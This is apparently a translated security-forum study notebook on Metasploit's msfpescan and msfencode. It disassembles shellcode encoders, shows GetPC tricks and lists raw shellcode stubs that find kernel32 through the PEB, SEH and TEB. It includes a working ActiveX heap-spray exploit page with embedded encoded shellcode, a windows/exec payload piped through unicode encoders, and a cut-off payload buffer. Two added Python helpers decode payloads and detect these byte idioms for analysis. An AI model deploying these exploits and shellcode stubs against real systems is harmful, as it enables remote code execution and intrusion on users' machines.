Using msfpescan, msfencode and related commands
First of all, the commands below are ones I wrote down as I used them; you could say they come up all the time.
First locate memdump.exe:
C:\Program Files\Metasploit\Framework3\msf3\tools\memdump\memdump.exe
In a CMD window run: memdump.exe <process PID> c:\abc
Then go into the console
and run msfpescan -p -m c:/abc > 1.txt. Damn, that needs Ruby installed... not installing it. Just using msfpescan -p xx.dll directly seems more convenient to me anyway.
e.g. msfpescan player.dll -p searches the DLL for all pop/pop/ret sequences.
Usage: /msf3/msfpescan [mode] <options> [targets]
Modes:
    -j, --jump [regA,regB,regC]      Search for jump equivalent instructions
    -p, --poppopret                  Search for pop+pop+ret combinations
    -r, --regex [regex]              Search for regex match
    -a, --analyze-address [address]  Display the code at the specified address
    -b, --analyze-offset [offset]    Display the code at the specified offset
    -f, --fingerprint                Attempt to identify the packer/compiler
    -i, --info                       Display detailed information about the image
    -R, --ripper [directory]         Rip all module resources to disk
        --context-map [directory]    Generate context-map files
Options:
    -M, --memdump                    The targets are memdump.exe directories
    -A, --after [bytes]              Number of bytes to show after match (-a/-b)
    -B, --before [bytes]             Number of bytes to show before match (-a/-b)
    -D, --disasm                     Disassemble the bytes at this address
    -I, --image-base [address]       Specify an alternate ImageBase
    -F, --filter-addresses [regex]   Filter addresses based on a regular expression
    -h, --help                       Show this message
Next, learning how to encode shellcode with msfencode:
root@bt:/opt/framework/msf3# ./msfencode -h
Usage: ./msfencode <options>
OPTIONS:
    -a <opt>  The architecture to encode as
    -b <opt>  The list of characters to avoid: '\x00\xff'
    -c <opt>  The number of times to encode the data
    -d <opt>  Specify the directory in which to look for EXE templates
    -e <opt>  The encoder to use
    -h        Help banner
    -i <opt>  Encode the contents of the supplied file path
    -k        Keep template working; run payload in new thread (use with -x)
    -l        List available encoders
    -m <opt>  Specifies an additional module search path
    -n        Dump encoder information
    -o <opt>  The output file
    -p <opt>  The platform to encode for
    -s <opt>  The maximum size of the encoded data
    -t <opt>  The output format: raw,ruby,rb,perl,pl,c,js_be,js_le,java,dll,exe,exe-small,elf,macho,vba,vbs,loop-vbs,asp,war
    -v        Increase verbosity
    -x <opt>  Specify an alternate executable template
root@bt:/opt/framework/msf3# ./msfencode -l
Framework Encoders
==================
    Name                    Rank       Description
    ----                    ----       -----------
    cmd/generic_sh          good       Generic Shell Variable Substitution Command Encoder
    cmd/ifs                 low        Generic ${IFS} Substitution Command Encoder
    cmd/printf_php_mq       manual     printf(1) via PHP magic_quotes Utility Command Encoder
    generic/none            normal     The "none" Encoder
    mipsbe/longxor          normal     XOR Encoder
    mipsle/longxor          normal     XOR Encoder
    php/base64              great      PHP Base64 encoder
    ppc/longxor             normal     PPC LongXOR Encoder
    ppc/longxor_tag         normal     PPC LongXOR Encoder
    sparc/longxor_tag       normal     SPARC DWORD XOR Encoder
    x64/xor                 normal     XOR Encoder
    x86/alpha_mixed         low        Alpha2 Alphanumeric Mixedcase Encoder
    x86/alpha_upper         low        Alpha2 Alphanumeric Uppercase Encoder
    x86/avoid_utf8_tolower  manual     Avoid UTF8/tolower
    x86/call4_dword_xor     normal     Call+4 Dword XOR Encoder
    x86/context_cpuid       manual     CPUID-based Context Keyed Payload Encoder
    x86/context_stat        manual     stat(2)-based Context Keyed Payload Encoder
    x86/context_time        manual     time(2)-based Context Keyed Payload Encoder
    x86/countdown           normal     Single-byte XOR Countdown Encoder
    x86/fnstenv_mov         normal     Variable-length Fnstenv/mov Dword XOR Encoder
    x86/jmp_call_additive   normal     Jump/Call XOR Additive Feedback Encoder
    x86/nonalpha            low        Non-Alpha Encoder
    x86/nonupper            low        Non-Upper Encoder
    x86/shikata_ga_nai      excellent  Polymorphic XOR Additive Feedback Encoder
    x86/single_static_bit   manual     Single Static Bit
    x86/unicode_mixed       manual     Alpha2 Alphanumeric Unicode Mixedcase Encoder
    x86/unicode_upper       manual     Alpha2 Alphanumeric Unicode Uppercase Encoder
Studying several shellcode encoding/encryption schemes:
The shellcode you get is different every time: the value held in ESI, the position of the instruction that obtains the decoder's start address, the register used to record that position, the instructions ahead of the loop, and the variable values all change.
1) x86/shikata_ga_nai
00427400 BA 99B20D32 mov edx,0x320DB299
00427405 DBC9 fcmovne st,st(1)
00427407 D97424 F4 fstenv (28-byte) ptr ss:[esp-0xC] // this instruction yields the address of the decoder's first FPU instruction; it only works if at least one FPU instruction has already executed
// that FPU instruction can be any of: fcmovne st,st(1)  fldpi  fldz  ffree st(3)  fcmovnb st,st  fcmovnbe st,st(5)
0042740B 5D pop ebp
0042740C 29C9 sub ecx,ecx
0042740E B1 46 mov cl,0x46
00427410 3155 13 xor dword ptr ss:[ebp+0x13],edx // xor decode
00427413 83C5 04 add ebp,0x4
00427416 0355 96 add edx,dword ptr ss:[ebp-0x6A]
00427419 ^E2 F5 loopd Xtest1231.00427410 // LOOP walks over the encoded data
2) x86/alpha_mixed: the main idea is to regenerate the original code (through a loop)
00427400 > 89E0 mov eax,esp
00427402 DBD3 fcmovnbe st,st(3)
00427404 D970 F4 fstenv (28-byte) ptr ds:[eax-0xC]
00427407 5D pop ebp
00427408 55 push ebp
00427409 59 pop ecx
0042740A 49 dec ecx
0042740B 49 dec ecx
0042740C 49 dec ecx
0042740D 49 dec ecx
0042740E 49 dec ecx
0042740F 49 dec ecx
00427410 49 dec ecx
00427411 49 dec ecx
00427412 49 dec ecx
00427413 49 dec ecx
00427414 43 inc ebx
00427415 43 inc ebx
00427416 43 inc ebx
00427417 43 inc ebx
00427418 43 inc ebx
00427419 43 inc ebx
0042741A 37 aaa
0042741B 51 push ecx
0042741C 5A pop edx
0042741D 6A 41 push 0x41
0042741F 58 pop eax
00427420 50 push eax
00427421 3041 30 xor byte ptr ds:[ecx+0x30],al
00427424 41 inc ecx
00427425 6B41 41 10 imul eax,dword ptr ds:[ecx+0x41],0x10
00427429 3241 42 xor al,byte ptr ds:[ecx+0x42]
0042742C 3242 42 xor al,byte ptr ds:[edx+0x42]
0042742F 3042 42 xor byte ptr ds:[edx+0x42],al
00427432 41 inc ecx
00427433 42 inc edx
00427434 58 pop eax
00427435 50 push eax
00427436 3841 42 cmp byte ptr ds:[ecx+0x42],al
00427439 ^ 75 E9 jnz Xtest1231.00427424
3) x86/fnstenv_mov: again decrypts to produce the original code
00427400 > 6A 3F push 0x3F
00427402 59 pop ecx
00427403 D9EE fldz
00427405 D97424 F4 fstenv (28-byte) ptr ss:[esp-0xC] ; these two instructions obtain the current address, which the decryption then works from
00427409 5B pop ebx
0042740A 8173 13 413EFDC3 xor dword ptr ds:[ebx+0x13],0xC3FD3E41 ; Decrypt -> 00427416
00427411 83EB FC sub ebx,-0x4
00427414 ^ E2 F4 loopd Xtest1231.0042740A
00427416 D9EB fldpi
4) x86/call4_dword_xor
00427400 > 31C9 xor ecx,ecx
00427402 83E9 C1 sub ecx,-0x3F
00427405 E8 FFFFFFFF call test1231.00427409 ; unlike the ones above, this uses a call to obtain the address of the next instruction
0042740A C05E 81 76 rcr byte ptr ds:[esi-0x7F],0x76
0042740E 0E push cs
0042740F D6 salc
00427410 8A28 mov ch,byte ptr ds:[eax]
00427412 AC lods byte ptr ds:[esi]
00427413 83EE FC sub esi,-0x4
00427416 ^ E2 F4 loopd Xtest1231.0042740C
5) skylined alpha3
The MFC program in the 半斤八两 collection at http://bbs.pediy.com/showthread.php?t=156913 uses exactly this encoder.
~~~ Tip: changing the icon in the top-left corner of an MFC window
HICON m_hIcon;
m_hIcon = AfxGetApp()->LoadIcon(IDI_ICON1); // IDI_ICON1 is the resource ID; to use another icon, pass that icon's resource ID
SetIcon(m_hIcon, TRUE);
Note that to use it, EIP and EAX must both point at the start of the shellcode.
Everything can be converted into printable code ~~~
00427400 50 push eax ; eax initially points at the first byte of the shellcode
00427401 59 pop ecx
00427402 49 dec ecx
00427403 49 dec ecx
00427404 49 dec ecx
00427405 49 dec ecx
00427406 49 dec ecx
00427407 49 dec ecx
00427408 49 dec ecx
00427409 49 dec ecx
0042740A 49 dec ecx
0042740B 49 dec ecx
0042740C 49 dec ecx
0042740D 49 dec ecx
0042740E 49 dec ecx
0042740F 49 dec ecx
00427410 49 dec ecx
00427411 49 dec ecx
00427412 37 aaa
00427413 51 push ecx
00427414 5A pop edx
00427415 6A 41 push 0x41
00427417 58 pop eax
00427418 50 push eax
00427419 3041 30 xor byte ptr ds:[ecx+0x30],al
0042741C 41 inc ecx
0042741D 6B41 41 10 imul eax,dword ptr ds:[ecx+0x41],0x10
00427421 3241 42 xor al,byte ptr ds:[ecx+0x42]
00427424 3242 42 xor al,byte ptr ds:[edx+0x42]
00427427 3042 42 xor byte ptr ds:[edx+0x42],al
0042742A 41 inc ecx
0042742B 42 inc edx
0042742C 58 pop eax
0042742D 50 push eax
0042742E 3841 42 cmp byte ptr ds:[ecx+0x42],al
00427431 ^ 75 E9 jnz Xtest1231.0042741C
~~~
GETPC methods ~~~
1) call $+4 (note: call $+5 does not work well)
00427400 E8 FFFFFFFF call test1231.00427404 ; jumps to 00427404, where FFC3 inc ebx is harmless; a pop ecx then puts the return address 00427405 into ecx
00427405 C3 retn
00427406 59 pop ecx
2) FSTENV
00427403 D9EE fldz ; an FPU instruction
00427405 D97424 F4 fstenv (28-byte) ptr ss:[esp-0xC] ; saves the FPU state after that first instruction has executed; the first instruction's address is stored at offset 0xC, so a single pop retrieves it
3) Backward call
00427400 /EB 03 jmp Xtest1231.00427405 ; 1) jmp
00427402 |5E pop esi ; 3) pops 0042740A into esi
00427403 |FFD6 call esi ; 4) pushes 00427405 onto the stack and continues at 0042740A
00427405 E8 F8FFFFFF call test1231.00427402 ; 2) pushes the next address, 0042740A, onto the stack
0042740A 49 dec ecx ; test1231.00427405
4) SEH GetPC
Finding kernel32.dll, because we want LoadLibrary and GetProcAddress
lkd> dt _peb
nt!_PEB
   +0x000 InheritedAddressSpace : UChar
   +0x001 ReadImageFileExecOptions : UChar
   +0x002 BeingDebugged : UChar
   +0x003 SpareBool : UChar
   +0x004 Mutant : Ptr32 Void
   +0x008 ImageBaseAddress : Ptr32 Void
   +0x00c Ldr : Ptr32 _PEB_LDR_DATA
   +0x010 ProcessParameters : Ptr32 _RTL_USER_PROCESS_PARAMETERS
   +0x014 SubSystemData : Ptr32 Void
   ...
lkd> dt _PEB_LDR_DATA
nt!_PEB_LDR_DATA
   +0x000 Length : Uint4B
   +0x004 Initialized : UChar
   +0x008 SsHandle : Ptr32 Void
   +0x00c InLoadOrderModuleList : _LIST_ENTRY
   +0x014 InMemoryOrderModuleList : _LIST_ENTRY
   +0x01c InInitializationOrderModuleList : _LIST_ENTRY
   +0x024 EntryInProgress : Ptr32 Void
lkd> dt _ldr_data_table_entry
nt!_LDR_DATA_TABLE_ENTRY
   +0x000 InLoadOrderLinks : _LIST_ENTRY
   +0x008 InMemoryOrderLinks : _LIST_ENTRY
   +0x010 InInitializationOrderLinks : _LIST_ENTRY
   +0x018 DllBase : Ptr32 Void
   +0x01c EntryPoint : Ptr32 Void
   +0x020 SizeOfImage : Uint4B
   +0x024 FullDllName : _UNICODE_STRING
   +0x02c BaseDllName : _UNICODE_STRING
   +0x034 Flags : Uint4B
   ...
lkd> dt _UNICODE_STRING
nt!_UNICODE_STRING
   +0x000 Length : Uint2B
   +0x002 MaximumLength : Uint2B
   +0x004 Buffer : Ptr32 Uint2B
1) Via the PEB
(1) Via Ldr + 0xC, the InLoadOrderModuleList structure. Generic ~~~
0040D4AF |. 33D2 xor edx,edx
0040D4B1 |. 64:8B5A 30 mov ebx,dword ptr fs:[edx+0x30] ; PEB
0040D4B5 |. 8B5B 0C mov ebx,dword ptr ds:[ebx+0xC] ; Ldr
0040D4B8 |. 8B5B 0C mov ebx,dword ptr ds:[ebx+0xC] ; InLoadOrderModuleList: the _LIST_ENTRY is itself the start of an LDR_DATA_TABLE_ENTRY
0040D4BB |. 8B1B mov ebx,dword ptr ds:[ebx] ; InLoadOrderLinks -> WIN7: here [ebx+0x18] is the base of SysWOW64\ntdll.dll; XP SP3: system32\ntdll.dll
0040D4BD |. 8B1B mov ebx,dword ptr ds:[ebx] ; InLoadOrderLinks -> WIN7: here [ebx+0x18] is the base of SysWOW64\kernel32.dll; XP SP3: system32\kernel32.dll
0040D4BF |. 8B5B 18 mov ebx,dword ptr ds:[ebx+0x18] ; +0x018 DllBase : Ptr32 Void
0040D4C2 |. 8BEB mov ebp,ebx ; kernel32.74CB0000
33 D2 64 8B 5A 30 8B 5B 0C 8B 5B 0C 8B 1B 8B 1B 8B 5B 18 8B EB
(2) Via Ldr + 0x14, InMemoryOrderModuleList. Generic ~~~
0040D4AF 33DB xor ebx,ebx
0040D4B1 64:8B5B 30 mov ebx,dword ptr fs:[ebx+0x30]
0040D4B5 8B5B 0C mov ebx,dword ptr ds:[ebx+0xC] ; Ldr
0040D4B8 8B5B 14 mov ebx,dword ptr ds:[ebx+0x14] ; InMemoryOrderModuleList
0040D4BB 8B1B mov ebx,dword ptr ds:[ebx] ; InMemoryOrderLinks -> WIN7: here [ebx+0x20] is the base of SysWOW64\ntdll.dll; XP SP3: system32\ntdll.dll
0040D4BD 8B1B mov ebx,dword ptr ds:[ebx] ; InMemoryOrderLinks -> WIN7: here [ebx+0x20] is the base of SysWOW64\kernel32.dll; XP SP3: system32\kernel32.dll
0040D4BF 8B5B 10 mov ebx,dword ptr ds:[ebx+0x10] ; [ebx+0x10] is DllBase
33 DB 64 8B 5B 30 8B 5B 0C 8B 5B 14 8B 1B 8B 1B 8B 5B 10 8B EB
(3) The following also works on Windows 2000; it is built to verify BaseDllName by its hash value. Generic ~~~
0040D4AF FC cld
0040D4B0 33D2 xor edx,edx
0040D4B2 64:8B52 30 mov edx,dword ptr fs:[edx+0x30]
0040D4B6 8B52 0C mov edx,dword ptr ds:[edx+0xC]
0040D4B9 8B52 14 mov edx,dword ptr ds:[edx+0x14] ; InMemoryOrderModuleList
0040D4BC 8B72 28 mov esi,dword ptr ds:[edx+0x28] ; BaseDllName -> Buffer
0040D4BF 6A 18 push 0x18 ; kernel32.dll length = 12*2
0040D4C1 59 pop ecx
0040D4C2 33FF xor edi,edi
0040D4C4 33C0 xor eax,eax
0040D4C6 AC lods byte ptr ds:[esi]
0040D4C7 3C 61 cmp al,0x61 ; cmp al,'a'
0040D4C9 7C 02 jl Xtest1231.0040D4CD
0040D4CB 2C 20 sub al,0x20
0040D4CD C1CF 0D ror edi,0xD
0040D4D0 03F8 add edi,eax
0040D4D2 ^ E2 F0 loopd Xtest1231.0040D4C4
0040D4D4 81FF 5BBC4A6A cmp edi,0x6A4ABC5B
0040D4DA 8B5A 10 mov ebx,dword ptr ds:[edx+0x10] ; DllBase
0040D4DD 8B12 mov edx,dword ptr ds:[edx] ; next InMemoryOrderLinks
0040D4DF ^ 75 DB jnz Xtest1231.0040D4BC ; ebx = kernel32.dll base
FC 33 D2 64 8B 52 30 8B 52 0C 8B 52 14 8B 72 28 6A 18 59 33 FF 33 C0 AC 3C 61 7C 02 2C 20 C1 CF
0D 03 F8 E2 F0 81 FF 5B BC 4A 6A 8B 5A 10 8B 12 75 DB
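As an added example (not code from the original post), here is the hash from listing (3) written out in Python: it reproduces the `ror edi,0xD; add edi,eax` loop over the UTF-16LE, case-folded BaseDllName, and adds the reverse lookup an analyst needs when a constant such as 0x6A4ABC5B turns up in a sample. The candidate module list and the helper names are my own choices.

```python
# Added example, not from the original post: the ROR-13 module-name hash from listing (3),
# plus the reverse lookup an analyst uses to name a hash constant found in a sample.


def ror32(value, count):
    """x86 `ror` on a 32-bit register."""
    value &= 0xFFFFFFFF
    return ((value >> count) | (value << (32 - count))) & 0xFFFFFFFF


def module_name_hash(name, length=None):
    """Hash `name` the way the listing hashes BaseDllName.

    BaseDllName.Buffer is UTF-16LE, so the loop also consumes the 0x00 byte after each
    character. A byte in 'a'..0x7f is folded to uppercase (`cmp al,0x61; jl; sub al,0x20`
    is a signed compare), then mixed in with `ror edi,0xD; add edi,eax`.
    `length` is the byte count the loop runs over (the listing pushes 0x18 = 24 for
    "kernel32.dll"); by default the whole UTF-16LE name is hashed.
    """
    data = name.encode("utf-16-le")
    if length is None:
        length = len(data)
    h = 0
    for b in data[:length]:
        if 0x61 <= b < 0x80:  # lowercase ASCII -> uppercase
            b -= 0x20
        h = (ror32(h, 13) + b) & 0xFFFFFFFF
    return h


# Candidate names are my own choice; extend the list with whatever a sample might look for.
CANDIDATE_MODULES = ("ntdll.dll", "kernel32.dll", "kernelbase.dll", "user32.dll", "ws2_32.dll")


def identify_module(hash_value, candidates=CANDIDATE_MODULES):
    """Return the candidate whose hash equals `hash_value`, or None if none matches."""
    for name in candidates:
        if module_name_hash(name) == hash_value:
            return name
    return None


if __name__ == "__main__":
    h = module_name_hash("kernel32.dll")
    print("kernel32.dll -> 0x%08X" % h)  # the constant compared by `cmp edi,0x6A4ABC5B`
    print("0x6A4ABC5B ->", identify_module(0x6A4ABC5B))
```

Because the zero bytes of the UTF-16 buffer are hashed too, hashing the ASCII name directly gives a different value; that is why the listing pushes 0x18 rather than 12 as the loop count.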
(4) Ldr + 0x1C InInitializationOrderModuleList, verified by checking the buffer length. Generic ~~~
0040D4AF 33C9 xor ecx,ecx
0040D4B1 64:8B71 30 mov esi,dword ptr fs:[ecx+0x30]
0040D4B5 8B76 0C mov esi,dword ptr ds:[esi+0xC] ; Ldr
0040D4B8 8B76 1C mov esi,dword ptr ds:[esi+0x1C] ; InInitializationOrderModuleList
0040D4BB 8B6E 08 mov ebp,dword ptr ds:[esi+0x8] ; esi+0x8 = DllBase
0040D4BE 8B7E 20 mov edi,dword ptr ds:[esi+0x20] ; esi+0x20 = BaseDllName -> Buffer
0040D4C1 8B36 mov esi,dword ptr ds:[esi] ; next InInitializationOrderLinks
0040D4C3 384F 18 cmp byte ptr ds:[edi+0x18],cl ; modulename[12] == 0? len(KERNELBASE.dll)=14, len(kernel32.dll)=12
0040D4C6 ^ 75 F3 jnz Xtest1231.0040D4BB ; ebp = kernel32 base
33 C9 64 8B 71 30 8B 76 0C 8B 76 1C 8B 6E 08 8B 7E 20 8B 36 38 4F 18 75 F3
(5) Not generic: it contains 00 bytes, and Win7 and XP differ. Ldr + 0x1C InInitializationOrderModuleList. Not generic ~~~
0040D4AF 33C0 xor eax,eax
0040D4B1 64:8B40 30 mov eax,dword ptr fs:[eax+0x30]
0040D4B5 8B40 0C mov eax,dword ptr ds:[eax+0xC] ; Ldr
0040D4B8 8B70 1C mov esi,dword ptr ds:[eax+0x1C] ; InInitializationOrderModuleList
0040D4BB AD lods dword ptr ds:[esi] ; InInitializationOrderLinks -> WIN7: here FullDllName [ebx+0x18] is syswow64\KERNELBASE.dll; XP SP3: system32\kernel32.dll
0040D4BC 8B00 mov eax,dword ptr ds:[eax] ; InInitializationOrderLinks -> WIN7: here FullDllName [ebx+0x18] is syswow64\kernel32.dll; XP SP3: here [eax+0x8] is already the kernel32.dll base
0040D4BE 8B40 08 mov eax,dword ptr ds:[eax+0x8] ; [eax+0x8] is DllBase, kernel32.74CB0000
On Win7 this is because it is a 32-bit program, so it is encoded as 32-bit.
Below is SEH background, as a refresher
ntdll!_TEB
   struct _TEB, 66 elements, 0xfb8 bytes
   +0x000 NtTib : struct _NT_TIB, 8 elements, 0x1c bytes
      +0x000 ExceptionList : Ptr32 to struct _EXCEPTION_REGISTRATION_RECORD, 2 elements, 0x8 bytes
         +0x000 Next : Ptr32 to struct _EXCEPTION_REGISTRATION_RECORD, 2 elements, 0x8 bytes
         +0x004 Handler : Ptr32 to _EXCEPTION_DISPOSITION
      +0x004 StackBase : Ptr32 to Void
      +0x008 StackLimit : Ptr32 to Void
      +0x00c SubSystemTib : Ptr32 to Void
      +0x010 FiberData : Ptr32 to Void
      +0x010 Version : Uint4B
2) Via SEH
The technique below requires the last exception handler (the record whose Next is 0xffffffff) to point into kernel32.dll. Once that pointer into kernel32 is found,
all that remains is to loop backwards to the top of the module and compare the first two bytes.
If the last exception handler does not point into kernel32.dll, this technique obviously fails.
Fails on my Win7 ~~~
0040D4AF 56 push esi
0040D4B0 51 push ecx
0040D4B1 33C9 xor ecx,ecx ; ecx = 0
0040D4B3 64:8B31 mov esi,dword ptr fs:[ecx] ; esi = NtTib = pointer to nseh
0040D4B6 AD lods dword ptr ds:[esi] ; eax = pointer to the next nseh (0xffffffff)
0040D4B7 96 xchg eax,esi ; esi = pointer to the next nseh (0xffffffff), eax = NtTib = pointer to nseh
0040D4B8 390E cmp dword ptr ds:[esi],ecx ; nseh == 0?
0040D4BA ^ 79 FA jns Xtest1231.0040D4B6
0040D4BC AD lods dword ptr ds:[esi] ; eax = ffffffff, esi+4 points to seh
0040D4BD AD lods dword ptr ds:[esi] ; eax = seh address
0040D4BE 48 dec eax
0040D4BF 66:33C0 xor ax,ax
0040D4C2 66:8138 4D5A cmp word ptr ds:[eax],0x5A4D
0040D4C7 ^ 75 F5 jnz Xtest1231.0040D4BE ; eax = ntdll.dll base
0040D4C9 59 pop ecx
0040D4CA 5E pop esi
0040D4CB C3 retn
56 51 33 C9 64 8B 31 AD 96 39 0E 79 FA AD AD 48 66 33 C0 66 81 38 4D 5A 75 F5 59 5E C3
3) TOPSTACK TEB
Works on XP SP3, not on Win7 ~~~
0044F611 > 56 push esi
0044F612 33F6 xor esi,esi
0044F614 64:8B46 04 mov eax,dword ptr fs:[esi+0x4]
0044F618 8B40 E4 mov eax,dword ptr ds:[eax-0x1C] ; handler
0044F61B 48 dec eax ; kernel32._except_handler3; SE handler installed
0044F61C 66:33C0 xor ax,ax
0044F61F 66:8138 4D5A cmp word ptr ds:[eax],0x5A4D
0044F624 ^ 75 F5 jnz X表白专用.0044F61B
0044F626 5E pop esi
0044F627 C3 retn
56 33 F6 64 8B 46 04 8B 40 E4 48 66 33 C0 66 81 38 4D 5A 75 F5 5E C3
To explain: the top-level exception handler structure is always placed at the very top of the thread stack, minus 20h.
Learning UNICODE encoding ~~~:
root@bt:/opt/framework/msf3# ./msfencode -i /root/Desktop/1.dat -c 1 -b '\x00' -e x86/shikata_ga_nai -t js_le
[*] x86/shikata_ga_nai succeeded with size 195 (iteration=1)
%uc3d9%u74d9%uf424%uf1b8%u721d%u5dcc%uc929%u2bb1%uc583%u3104%u1345%ub403%u900e%uca39%u3e59%u0ac8%ud684%ue3af%u6969%uc158%ue7fd%uae94%u8a0a%u44db%u4ec1%ua094%u920d%u13bd%u6662%u0b11%uf5f0%ub9f0%ucaae%u5928%u77c4%u2afd%u8b91%u6576%u1f3a%ufe81%u172b%u3d3f%u2dc6%u2307%u3763%ua4e2%ucfdc%u3a99%u6a68%u319e%u7022%u46a6%uf176%u680f%udb8b%u9783%u68cc%udcd7%u9bd0%u2d81%u6569%uf588%u62e1%u3f2d%u700e%uf97d%u87fa%u5146%u7bd9%ubdcc%uddaa%u3e0a%ubb70%u7cd9%ucff1%u6087%u0d06%ub434%u38b3%u6f64%u2394%u05a6%u9c11%uacc6%uef8c%u1d2d%u6ba7%u91b3%u1c14%u8110%ub23b%ue5dd%u1aef%ub6b2%uccf0%u6bce%ua4f0%u41d6
Can be used for ... and you can specify bad characters to leave out.
<object classid='clsid:2355C601-37D1-42B4-BEB1-03C773298DC8' id='target' /></object>
<script>
var nop = unescape("%u9090");
var shellcode=unescape("%uc3d9%u74d9%uf424%uf1b8%u721d%u5dcc%uc929%u2bb1%uc583%u3104%u1345%ub403%u900e%uca39%u3e59%u0ac8%ud684%ue3af%u6969%uc158%ue7fd%uae94%u8a0a%u44db%u4ec1%ua094%u920d%u13bd%u6662%u0b11%uf5f0%ub9f0%ucaae%u5928%u77c4%u2afd%u8b91%u6576%u1f3a%ufe81%u172b%u3d3f%u2dc6%u2307%u3763%ua4e2%ucfdc%u3a99%u6a68%u319e%u7022%u46a6%uf176%u680f%udb8b%u9783%u68cc%udcd7%u9bd0%u2d81%u6569%uf588%u62e1%u3f2d%u700e%uf97d%u87fa%u5146%u7bd9%ubdcc%uddaa%u3e0a%ubb70%u7cd9%ucff1%u6087%u0d06%ub434%u38b3%u6f64%u2394%u05a6%u9c11%uacc6%uef8c%u1d2d%u6ba7%u91b3%u1c14%u8110%ub23b%ue5dd%u1aef%ub6b2%uccf0%u6bce%ua4f0%u41d6")
while (nop.length < 0x100000/2) {nop += nop;}
nop=nop.substring(0,0x100000-32/2-4/2-2/2-1-shellcode.length);
nop =nop+ shellcode;
var memory = new Array();
for (var i=0;i<200;i++) {memory[i] += nop;}
arg1='\x0a';
while(arg1.length < 2000){arg1 += '\x0c';}
arg2 = '\x0c\x0c\x0c\x0c';
arg1 = arg1 + arg2;
target.Data = arg1;
</script>
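As an added example (not from the original post) that covers both the GETPC section and the js_le output above: a small Python analysis helper that turns the `%uXXXX` string msfencode printed back into bytes, confirms what `-b '\x00'` promises, and flags the GetPC and PEB/TEB-walk byte idioms from this page's listings. The signature list, the wildcard convention and the helper names are my own; the sample bytes are copied from this page.

```python
# Added example, not from the original post: decode an msfencode `-t js_le` string, check
# it for bad characters, and flag the GetPC / PEB-walk idioms shown in this page's listings.
# Signature list and helpers are my own; sample bytes below are copied from this page.
import re

# One %uXXXX escape is one UTF-16 code unit; js_le lays it out low byte first.
_UNIT = re.compile(r"%u([0-9a-fA-F]{4})")


def decode_js_le(payload):
    """'%uc3d9%u74d9...' -> bytes d9 c3 d9 74 ... (each unit little-endian)."""
    out = bytearray()
    for unit in _UNIT.findall(payload):
        value = int(unit, 16)
        out.append(value & 0xFF)  # low byte first
        out.append(value >> 8)
    return bytes(out)


def bad_char_offsets(data, bad=(0x00,)):
    """Offsets of every byte that is in `bad`; an empty list means the payload is clean."""
    bad = set(bad)
    return [i for i, b in enumerate(data) if b in bad]


# Byte idioms from the listings on this page. None is a wildcard for the ModRM byte,
# which only selects the register (fs:[edx+0x30], fs:[ebx+0x30], ... all match).
SIGNATURES = [
    ("fstenv GetPC: fstenv [esp-0xC]",             [0xD9, 0x74, 0x24, 0xF4]),
    ("fstenv GetPC: fstenv [eax-0xC]",             [0xD9, 0x70, 0xF4]),
    ("call $+4 GetPC",                             [0xE8, 0xFF, 0xFF, 0xFF, 0xFF]),
    ("PEB walk: mov r,fs:[r+0x30]; mov r,[r+0xC]", [0x64, 0x8B, None, 0x30, 0x8B, None, 0x0C]),
    ("TEB top-of-stack handler read",              [0x64, 0x8B, None, 0x04, 0x8B, None, 0xE4]),
]


def scan(data):
    """Return sorted (offset, description) pairs for every signature hit in `data`."""
    hits = []
    for name, pattern in SIGNATURES:
        for off in range(len(data) - len(pattern) + 1):
            if all(p is None or data[off + k] == p for k, p in enumerate(pattern)):
                hits.append((off, name))
    return sorted(hits)


# Sample inputs (copied from this page): the js_le output of shikata_ga_nai above, and the
# raw bytes of PEB-walk stub (2) and of the TOPSTACK TEB stub.
JS_LE_PAYLOAD = (
    "%uc3d9%u74d9%uf424%uf1b8%u721d%u5dcc%uc929%u2bb1%uc583%u3104%u1345%ub403%u900e%uca39"
    "%u3e59%u0ac8%ud684%ue3af%u6969%uc158%ue7fd%uae94%u8a0a%u44db%u4ec1%ua094%u920d%u13bd"
    "%u6662%u0b11%uf5f0%ub9f0%ucaae%u5928%u77c4%u2afd%u8b91%u6576%u1f3a%ufe81%u172b%u3d3f"
    "%u2dc6%u2307%u3763%ua4e2%ucfdc%u3a99%u6a68%u319e%u7022%u46a6%uf176%u680f%udb8b%u9783"
    "%u68cc%udcd7%u9bd0%u2d81%u6569%uf588%u62e1%u3f2d%u700e%uf97d%u87fa%u5146%u7bd9%ubdcc"
    "%uddaa%u3e0a%ubb70%u7cd9%ucff1%u6087%u0d06%ub434%u38b3%u6f64%u2394%u05a6%u9c11%uacc6"
    "%uef8c%u1d2d%u6ba7%u91b3%u1c14%u8110%ub23b%ue5dd%u1aef%ub6b2%uccf0%u6bce%ua4f0%u41d6"
)
PEB_WALK_STUB = bytes.fromhex("33DB648B5B308B5B0C8B5B148B1B8B1B8B5B108BEB")
TEB_TOPSTACK_STUB = bytes.fromhex("5633F6648B46048B40E4486633C06681384D5A75F55EC3")


def analyze(payload):
    """Decode a js_le string and return (byte length, bad-char offsets, signature hits)."""
    code = decode_js_le(payload)
    return len(code), bad_char_offsets(code), scan(code)


if __name__ == "__main__":
    print(analyze(JS_LE_PAYLOAD))   # (196, [], [(2, 'fstenv GetPC: fstenv [esp-0xC]')])
    print(scan(PEB_WALK_STUB))      # [(2, 'PEB walk: mov r,fs:[r+0x30]; mov r,[r+0xC]')]
    print(scan(TEB_TOPSTACK_STUB))  # [(3, 'TEB top-of-stack handler read')]
```

The 195-byte payload comes out as 196 bytes because js_le pads to whole 16-bit units. Only the decoder stub is visible in the clear (the fstenv GetPC at offset 2, right after the FPU instruction it depends on); the PEB-walk idioms are only exposed once the payload has been decoded, which is why byte signatures of this kind catch the stub rather than the body.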
Generating unicode shellcode with msfencode
root@bt:/opt/framework/msf3# ./msfpayload windows/exec CMD=calc R |
> ./msfencode -e x86/alpha_mixed -t raw |
> ./msfencode -e x86/unicode_upper BufferRegister=EAX -t perl
[*] x86/alpha_mixed succeeded with size 454 (iteration=1)
[*] x86/unicode_upper succeeded with size 1039 (iteration=1)
my $buf =
"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x51\x41" .
"\x54\x41\x58\x41\x5a\x41\x50\x55\x33\x51\x41\x44\x41\x5a" .
"\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51\x41\x49" .
"\x41\x51\x41\x50\x41\x35\x41\x41\x41\x50\x41\x5a\x31\x41" .
"\x49\x31\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49" .
"\x41\x58\x41\x35\x38\x41\x41\x50\x41\x5a\x41\x42\x41\x42" .
"\x51\x49\x31\x41\x49\x51\x49\x41\x49\x51\x49\x31\x31\x31" .
